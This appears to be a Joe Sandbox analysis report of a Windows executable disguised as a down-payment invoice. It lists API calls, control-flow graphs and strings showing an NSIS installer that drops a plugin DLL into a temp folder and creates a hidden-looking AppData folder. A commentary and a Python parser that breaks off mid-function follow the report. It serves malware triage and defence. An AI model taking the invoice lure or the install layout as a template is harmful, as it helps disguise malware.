• RegisterClassW.USER32(004291E0), ref: 00403C7D
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
• ShowWindow.USER32(00000005,00000000), ref: 00403D00
• GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
• GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
• RegisterClassW.USER32(004291E0), ref: 00403D42
• DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Admonishment64$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-1395080628
• Opcode ID: 4b8f836d1c50267b66867ec41ba414706936f04e84537f349976cd451a4143d2
• Instruction ID: d9d584b045f25ca5441dadad30e0f8e7905dec5efd4dcfd01c713d0f2754c543
• Opcode Fuzzy Hash: 4b8f836d1c50267b66867ec41ba414706936f04e84537f349976cd451a4143d2
• Instruction Fuzzy Hash: 6761C470204601BBE320AF669E45F2B3A7CEB84749F40447FF945B62E2DB7D9912C62D
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
• Executed
• Not Executed
                                                                                                                                                                                                                      control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 492 4030df-4030e5 462->492 489 403139-40313e 463->489 490 40314d-40317d call 40345d call 4031d6 463->490 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 485 40300e-403015 470->485 473->474 481 403087-403095 call 4068b5 474->481 482 403098-4030a2 474->482 481->482 482->452 482->453 485->474 491 403017-40301e 485->491 489->445 500 403182-403185 490->500 491->474 493 403020-403027 491->493 492->459 492->463 493->474 495 403029-403030 493->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
APIs
• GetTickCount.KERNEL32 ref: 00402F44
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,00000400), ref: 00402F60
  • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405EE2
  • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
• GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00402FA9
• GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
Strings
• "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 00402F30
                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                                                                                                                      • Inst, xrefs: 00403017
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
                                                                                                                                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                                                                                                                      • Error launching installer, xrefs: 00402F80
                                                                                                                                                                                                                      • C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
                                                                                                                                                                                                                      • Null, xrefs: 00403029
                                                                                                                                                                                                                      • soft, xrefs: 00403020
                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402F8B, 00402F90, 00402F96
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                      • API String ID: 2803837635-3043623874
                                                                                                                                                                                                                      • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                                                                                                                      • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 788 40640a-406415 789 406417-406426 788->789 790 406428-40643e 788->790 789->790 791 406444-406451 790->791 792 406656-40665c 790->792 791->792 795 406457-40645e 791->795 793 406662-40666d 792->793 794 406463-406470 792->794 796 406678-406679 793->796 797 40666f-406673 call 4063e8 793->797 794->793 798 406476-406482 794->798 795->792 797->796 800 406643 798->800 801 406488-4064c6 798->801 804 406651-406654 800->804 805 406645-40664f 800->805 802 4065e6-4065ea 801->802 803 4064cc-4064d7 801->803 808 4065ec-4065f2 802->808 809 40661d-406621 802->809 806 4064f0 803->806 807 4064d9-4064de 803->807 804->792 805->792 813 4064f7-4064fe 806->813 807->806 810 4064e0-4064e3 807->810 811 406602-40660e call 4063e8 808->811 812 4065f4-406600 call 40632f 808->812 814 406630-406641 lstrlenW 809->814 815 406623-40662b call 40640a 809->815 810->806 816 4064e5-4064e8 810->816 826 406613-406619 811->826 812->826 818 406500-406502 813->818 819 406503-406505 813->819 814->792 815->814 816->806 822 4064ea-4064ee 816->822 818->819 824 406540-406543 819->824 825 406507-40652e call 4062b6 819->825 822->813 827 406553-406556 824->827 828 406545-406551 GetSystemDirectoryW 824->828 838 406534-40653b call 40640a 825->838 839 4065ce-4065d1 825->839 826->814 830 40661b 826->830 832 4065c1-4065c3 827->832 833 406558-406566 GetWindowsDirectoryW 827->833 831 4065c5-4065c9 828->831 835 4065de-4065e4 call 40667c 830->835 831->835 840 4065cb 831->840 832->831 837 406568-406572 832->837 833->832 835->814 842 406574-406577 837->842 843 40658c-4065a2 SHGetSpecialFolderLocation 837->843 838->831 839->835 845 4065d3-4065d9 lstrcatW 839->845 840->839 842->843 846 406579-406580 842->846 847 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 843->847 848 4065bd 843->848 845->835 850 
406588-40658a 846->850 847->831 847->848 848->832 850->831 850->843
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                      • API String ID: 717251189-1230650788
                                                                                                                                                                                                                      • Opcode ID: a2b01db3f60f7f954ff39a6d01daadad3aad0d9bd747aef2f55d2b9b332750a0
                                                                                                                                                                                                                      • Instruction ID: cc84c68a284476d24e00a3f01d451b35d35df0cd5868c7a223589be4a576710b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b01db3f60f7f954ff39a6d01daadad3aad0d9bd747aef2f55d2b9b332750a0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7612371A00111ABDF209F64DD41AAE37A5AF50314F62813FE903B62D0E73E9AA2C75D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
                                                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences$C:\Users\user\AppData\Local\Temp\nskD796.tmp$C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll$Call
• API String ID: 1941528284-91660701
• Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
• Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
• Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
• Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (basic block: address range and API calls; -> successor blocks)
• 917: 40264a-402663 call 402c1f -> 920, 921
• 920: 402ac5-402ac8 -> 922
• 921: 402669-402670 -> 923, 924
• 922: 402ace-402ad4
• 923: 402672 -> 924
• 924: 402675-402678 -> 926, 927
• 926: 4027dc-4027e4 -> 920
• 927: 40267e-40268d call 406348 -> 926, 930
• 930: 402693 -> 931
• 931: 402699-40269d -> 932, 933
• 932: 402732-402735 -> 934, 935
• 933: 4026a3-4026be ReadFile -> 926, 936
• 934: 402737-40273a -> 935, 937
• 935: 40274d-40275d call 405f61 -> 926, 945
• 936: 4026c4-4026c9 -> 926, 939
• 937: 40273c-402747 call 405fbf -> 926, 935
• 939: 4026cf-4026dd -> 940, 941
• 940: 4026e3-4026f5 MultiByteToWideChar -> 944, 945
• 941: 402798-4027a4 call 40632f -> 922
• 944: 4026f7-4026fa -> 948
• 945: 40275f -> 950
• 948: 4026fc-402707 -> 950, 951
• 950: 402762-402765 -> 941, 952
• 951: 402709-40272e SetFilePointer MultiByteToWideChar -> 948, 955
• 952: 402767-40276c -> 953, 954
• 953: 4027a9-4027ad -> 957, 958
• 954: 40276e-402773 -> 953, 956
• 955: 402730 -> 945
• 956: 402775-402788 -> 926, 959
• 957: 4027ca-4027d6 SetFilePointer -> 926
• 958: 4027af-4027b3 -> 960, 961
• 959: 40278a-402790 -> 931, 962
• 960: 4027b5-4027b9 -> 957, 961
• 961: 4027bb-4027c8 -> 926
• 962: 402796 -> 926
APIs
• ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
• SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
  • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
• Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
• Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
• Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (basic block: address range and API calls; -> successor blocks)
• 963: 406752-406772 GetSystemDirectoryW -> 964, 965
• 964: 406774 -> 965
• 965: 406776-406778 -> 966, 967
• 966: 406789-40678b -> 969
• 967: 40677a-406783 -> 966, 968
• 968: 406785-406787 -> 969
• 969: 40678c-4067bf wsprintfW LoadLibraryExW
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
• wsprintfW.USER32 ref: 004067A4
• LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
• Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
• Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
• Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (basic block: address range and API calls; -> successor blocks)
• 970: 40591f-40596a CreateDirectoryW -> 971, 972
• 971: 405970-40597d GetLastError -> 973, 974
• 972: 40596c-40596e -> 973
• 973: 405997-405999
• 974: 40597f-405993 SetFileSecurityW -> 972, 975
• 975: 405995 GetLastError -> 973
APIs
• CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
• GetLastError.KERNEL32 ref: 00405976
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
• GetLastError.KERNEL32 ref: 00405995
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\Desktop
• API String ID: 3449924974-3370423016
• Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
• Instruction ID: 649461beb8834c01a631d5941a9b92c7b7a92d05cb5a935181bdf460574ff338
• Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
• Instruction Fuzzy Hash: DF011AB1C10619DADF009FA5C944BEFBFB4EF14354F00403AE545B6291DB789608CFA9
Uniqueness
Uniqueness Score: -1.00%
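The entries above record, per function, the Win32 calls with the argument values the sandbox recovered (a ? is an argument the report left unresolved), the strings the function references joined with $, and the dump the code was read from. Two things a triager wants out of that text are the file paths (the nskD796.tmp directory with System.dll under %TEMP%, which is the layout the NSIS installer uses for its System plugin, and the Admonishment64\Fremskyndelsen\Superintelligences folder under %LOCALAPPDATA%) and the meaning of the numeric constants: 00000008 passed to LoadLibraryExW at 004067B8 is LOAD_WITH_ALTERED_SEARCH_PATH, which together with the explicit system-directory path built by the %s%S.dll format string pins the load to that file rather than the default search order, and 80000007 passed to SetFileSecurityW at 0040598B is OWNER | GROUP | DACL | PROTECTED_DACL_SECURITY_INFORMATION, so the directory just created gets its own owner, group and DACL with inheritance from the parent blocked. The Python below is an added example, not part of the report or of Joe Sandbox: it parses entries in the text form shown here (the APIs and Similarity bullets), decodes those two constants with the Windows SDK flag names, and collects the file paths. SAMPLE is a constructed excerpt of the lines above; the function names are the example's own, the parser assumes only the report's layout (one bullet per call, a "ref:" address, $-joined strings), and the flag tables are partial subsets of the SDK definitions.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt: four function entries from the report above, in the report's own text form.
SAMPLE = r"""
Similarity
• String ID: C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences$C:\Users\user\AppData\Local\Temp\nskD796.tmp$C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll$Call
APIs
• ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
  • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
• wsprintfW.USER32 ref: 004067A4
• LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
Similarity
• String ID: %s%S.dll$UXTHEME$\
APIs
• CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
Similarity
• String ID: C:\Users\user\Desktop
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                         # raw tokens; "?" is a value the sandbox left unresolved
    ref: int                           # address of the call site
    subcall_of: "int | None" = None    # set on "Part of subcall function" bullets

@dataclass
class Entry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # "String ID" value split on "$"
    has_similarity: bool = False

API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<name>\w+)\."
                    r"(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
PATH_RE = re.compile(r'[A-Za-z]:\\[^\s"$,()]*')

def parse_api(body):
    m = API_RE.match(body)
    if m is None:
        raise ValueError(f"unrecognised API line: {body!r}")
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    return ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                   int(m["sub"], 16) if m["sub"] else None)

def parse_entries(text):
    # "APIs" always opens a new entry; "Similarity" only when the current one already has its block.
    entries, cur, mode = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Similarity" and (cur is None or cur.has_similarity)):
            cur = Entry()
            entries.append(cur)
        if line in ("APIs", "Similarity"):
            mode = line
            cur.has_similarity = cur.has_similarity or line == "Similarity"
        elif line.startswith("•") and cur is not None:
            body = line[1:].strip()
            if mode == "APIs":
                cur.apis.append(parse_api(body))
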